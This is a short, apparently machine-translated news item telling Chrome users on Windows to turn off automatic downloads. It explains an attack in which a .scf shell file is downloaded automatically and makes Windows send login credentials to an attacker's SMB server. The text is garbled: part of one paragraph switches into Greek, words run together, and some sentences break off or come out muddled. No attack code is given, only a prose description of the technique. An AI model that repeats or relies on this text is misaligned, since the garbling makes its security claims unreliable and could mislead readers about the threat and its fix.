Google users Chrome on Windows should immediately disable automatic downloads in the browser to protect authentication data from a newly discovered new threat.
The Chrome browser is currently the most popular browser on desktop devices. It is set to automatically transfer safe files to the user's system without prompting beforehandchoice.
Any file downloaded by Google Chrome users passes from Google's Safe Browsing controls to automatically transfer to the default download folder.
New attack, detailed on the Defense Code website, uses Google Chrome's autodownload behavior with Windows Explorer shell script files that have the .scf file extension.
The malicious script comes in the form of plain text that includes instructions, and limited commands. What is interesting is that it can load resources from a remote server.
The biggest problem is that Windows will process these files as soon as you open the folder where they are stored and that these files appear without extension in Windows Explorer regardless of the settings. This means that attackers could easily hide the file behind a covert file name, such as .jpg.
Attackers use an SMB server location to icon. Αυτό που συμβαίνει μετά είναι ότι ο διακομιστής ζητά την επαλήθευση ταυτότητας και ότι το σύστημα θα την παρέχει. Οι ερευνητές σημειώνουν ότι η σπάσιμο των κωδικών πρόσβασης είναι πια game, unless it is of a complex type.
The situation is even worse for Windows 8 or 10 users authenticating with a Microsoft account as the account will provide the attacker with access to online services such as Outlook, OneDrive, or Office 365 if used by user. There is also the possibility of reusing the password on sites that are not owned by Microsoft.